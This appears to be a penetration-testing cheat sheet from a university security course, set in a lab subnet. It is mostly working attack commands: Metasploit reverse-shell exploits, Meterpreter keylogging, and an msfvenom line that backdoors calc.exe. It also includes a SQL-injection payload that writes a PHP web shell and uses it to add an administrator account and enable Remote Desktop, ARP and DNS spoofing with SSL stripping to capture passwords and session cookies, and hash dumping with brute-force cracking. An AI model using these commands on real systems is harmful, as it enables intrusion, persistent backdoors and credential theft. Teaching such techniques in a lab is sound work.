NMAP

NMAP Host Discovery

ARP based
ICMP based
TCP SYN Ping
UDP Ping
Others
NMAP Port Scanning
SYN Scan (half-connect)
Connect Scan (complete 3-way handshake)
ACK Scan
UDP Scan
Others
NMAP options
Specify target
Specify ports
Output redirection
Scanning speed
No DNS resolution
Service version detection
OS detection
Scripts

Enumeration - smtp-user-enum

Vulnerability Scan
Nessus
NIKTO - web scanning
ZAP Proxy

Exploits
Metasploit
Meterpreter
Add Trojan
Microsoft Commands
Upload file to Microsoft Windows
Using SMB share
Using meterpreter

Web Vulnerabilities
SQL Injection
Add script through SQL Injection

Network Attacks
 ARP spoofing
MitM
HTTPS method 1 - DNS spoofing
HTTPs method 2 - SSL Stripping

Password Attack
Medusa (remote)
John the Ripper
Complex passwords generator
Unshadowing (local)
Crack LM/NTML hashes (local)
Crack LM
Crack NTLM
Hydra (remote)
Online rainbowtables

NMAP

NMAP Host Discovery

ARP based
nmap -sn

ICMP based
nmap -sn

TCP SYN Ping

nmap -PS

UDP Ping
nmap -PU

Others
https://nmap.org/book/man-host-discovery.html
NMAP Port Scanning

SYN Scan (half-connect)

root rights
nmap -sS

Connect Scan (complete 3-way handshake)

no root rights
nmap -sT

ACK Scan
nmap -sA

UDP Scan
if ICM Host Unreachable - port closed
else not sure!
nmap -sU

Others
https://nmap.org/book/man-port-scanning-techniques.html

NMAP options

Specify target
192.168.1-254.1-254
IP/16
nmap -iL iplist.txt

Specify ports
-p21,22
-p1-65535

Output redirection
nmap -oN output.txt 192.168.1.1
Scanning speed
-T<0-5> implicit 3

No DNS resolution
-n

Service version detection

-sV

OS detection
-O

Scripts
ls /usr/share/nmap/scripts
nmap --script <script>
nmap --script discovery <IP>
nmap --script http* <IP>

Enumeration - smtp-user-enum
https://github.com/pentestmonkey/smtp-user-enum/blob/master/smtp-user-enum-user-docs.
pdf
smtp-user-enum -M [method: VRFY, EXPN, RCPT TO] -U [UserList] -t [target]

Vulnerability Scan

Nessus
Download: ​http://www.tenable.com/products/nessus/select-your-operating-system#tos
Verify: netstat -tlnp | grep 8834
service nessusd restart
To Disable Categories: In Policy, Plugins Tab, Disable brute force and Denial of Service

NIKTO - web scanning

nikto -Help
nikto -host 172.16.150.130 -port 80 -output 'test.nikto' -Format txt
ZAP Proxy
can be used as proxy in browser (port 8080)

Exploits

Metasploit
msfconsole
> search <vulnerability code> ex: ms08-067
> use <path returned by search>
> info --------------> list what is already configured ex: RHOST
> show options
> show payloads -----> list of payloads that can be exploited
> set RHOST <IP target>
> set LHOST <local IP>
> set PAYLOAD <chosen payload> ex: windows/shell/reverse_tcp
> exploit

Meterpreter
> set PAYLOAD <meterpreter payload> ex: windows/meterpreter/reverse_tcp
> exploit
> download C:\\WINDOWS\\system32\\calc.exe /root/
> keyscan start
> keyscan dump

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

Add Trojan
ex:
msfvenom -p windows/shell/reverse_tcp LHOST=172.16.150.129 -a x86 --platform Windows
-e x86/shikata_ga_nai -i 3 -x /root/calc.exe -o calc_backdoor.exe

put metasploit to listen for connections

> use exploit/multi/handler
> set PAYLOAD windows/shell/reverse_tcp
> set LHOST 172.16.150.129
> exploit
Microsoft Commands
net user <user> <password> /add
net localgroup Administrators <user> /add ---> add user to the Administrator group
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
/t REG_DWORD /d 0 /f -------> Remote Desktop

Upload file to Microsoft Windows

Using SMB share

smbclient //172.16.150.130/shared
>put calc_backdoor.exe

Using meterpreter
meterpreter> upload calc_backdoor.exe C://WINDOWS//system32

Web Vulnerabilities

SQL Injection
Discover the vulnerabilities with ZapProxy
http://pentestmonkey.net/category/cheat-sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://www.101hacker.com/2010/12/sql-injection-tutorial.html

Add script through SQL Injection

player=ZAP' UNION SELECT "<?php echo passthru($_GET['cmd']); ?>",2,3,4 into outfile
"c:\\xampp\\htdocs\\c.php" -- `

http://172.16.150.130/c.php?cmd=hostname
http://172.16.150.130/c.php?cmd=​net user <user> <password> /add
http://172.16.150.130/c.php?cmd=​net localgroup Administrators <user> /add ---> add user to
the Administrator group
http://172.16.150.130/c.php?cmd=​reg add
"HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f

Network Attacks

ARP spoofing

MitM
IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2 ← IPtarget IPgateway

Wireshark - filter HTTP

Wireshark, select one packet from target -> Right Click -> Follow TCP Stream
Get Session Cookie and add to your browser

HTTPS method 1 - DNS spoofing

IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2 ← IPtarget IPgateway
echo "172.16.150.129 cs.curs.pub.ro" > myhosts.txt ← attacker IP
dnsspoof -i eth0 -f myhosts.txt

root@kali:~# webmitm -ddd cs.curs.pub.ro

Country Name (2 letter code) [AU]:RO
State or Province Name (full name) [Some-State]:Romania
Locality Name (eg, city) []:Bucharest
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Universitatea POLITEHNICA
din Bucuresti
Organizational Unit Name (eg, section) []:NCIT Cluster
Common Name (e.g. server FQDN or YOUR name) []:acs.curs.pub.ro
Email Address []:me@example.com

--close---

webmitm -ddd cs.curs.pub.ro &> webmitm.cs.curs.pub.ro.log

cat webmitm.cs.curs.pub.ro.log
cat webmitm.cs.curs.pub.ro.log | grep -i username=
HTTPs method 2 - SSL Stripping
IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2 ← IPtarget IPgateway

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234

sslstrip -l 1234 -s -w traffic.log

cat traffic.log | grep -i \&password=

Password Attack
https://github.com/danielmiessler/SecLists/tree/master/Passwords
https://github.com/danielmiessler/SecLists/blob/master/Passwords/500-worst-passwords.txt

Medusa (remote)
medusa -h 172.16.150.132 -u dexter -P 500-worst-passwords.txt -M ssh
http://foofus.net/goons/jmk/medusa/medusa.html

John the Ripper

Complex passwords generator

john --rules --wordlist=500-worst-passwords.txt --stdout > newdictionary.txt

Unshadowing (local)
unshadow passwd shadow > unshadow.txt
john unshadow.txt

Crack LM/NTML hashes (local)

meterpreter> run post/windows/gather/hashdump
- copy hases in txt file

Crack LM
john --format=LM windump.txt
john --show windump.txt
Crack NTLM
john --show windump.txt | cut -d: -f2 > pwd_LM.txt
john --wordlist=pwd_LM.txt --rules=NT --format=NT hashes.txt
john --show --rules=NT --format=NT windump.txt

Hydra (remote)
hydra -l dexter -P newdictionary.txt ssh://172.16.150.132

Online rainbowtables
http://rainbowtables.it64.com/
https://crackstation.net/
https://www.objectif-securite.ch/en/ophcrack.php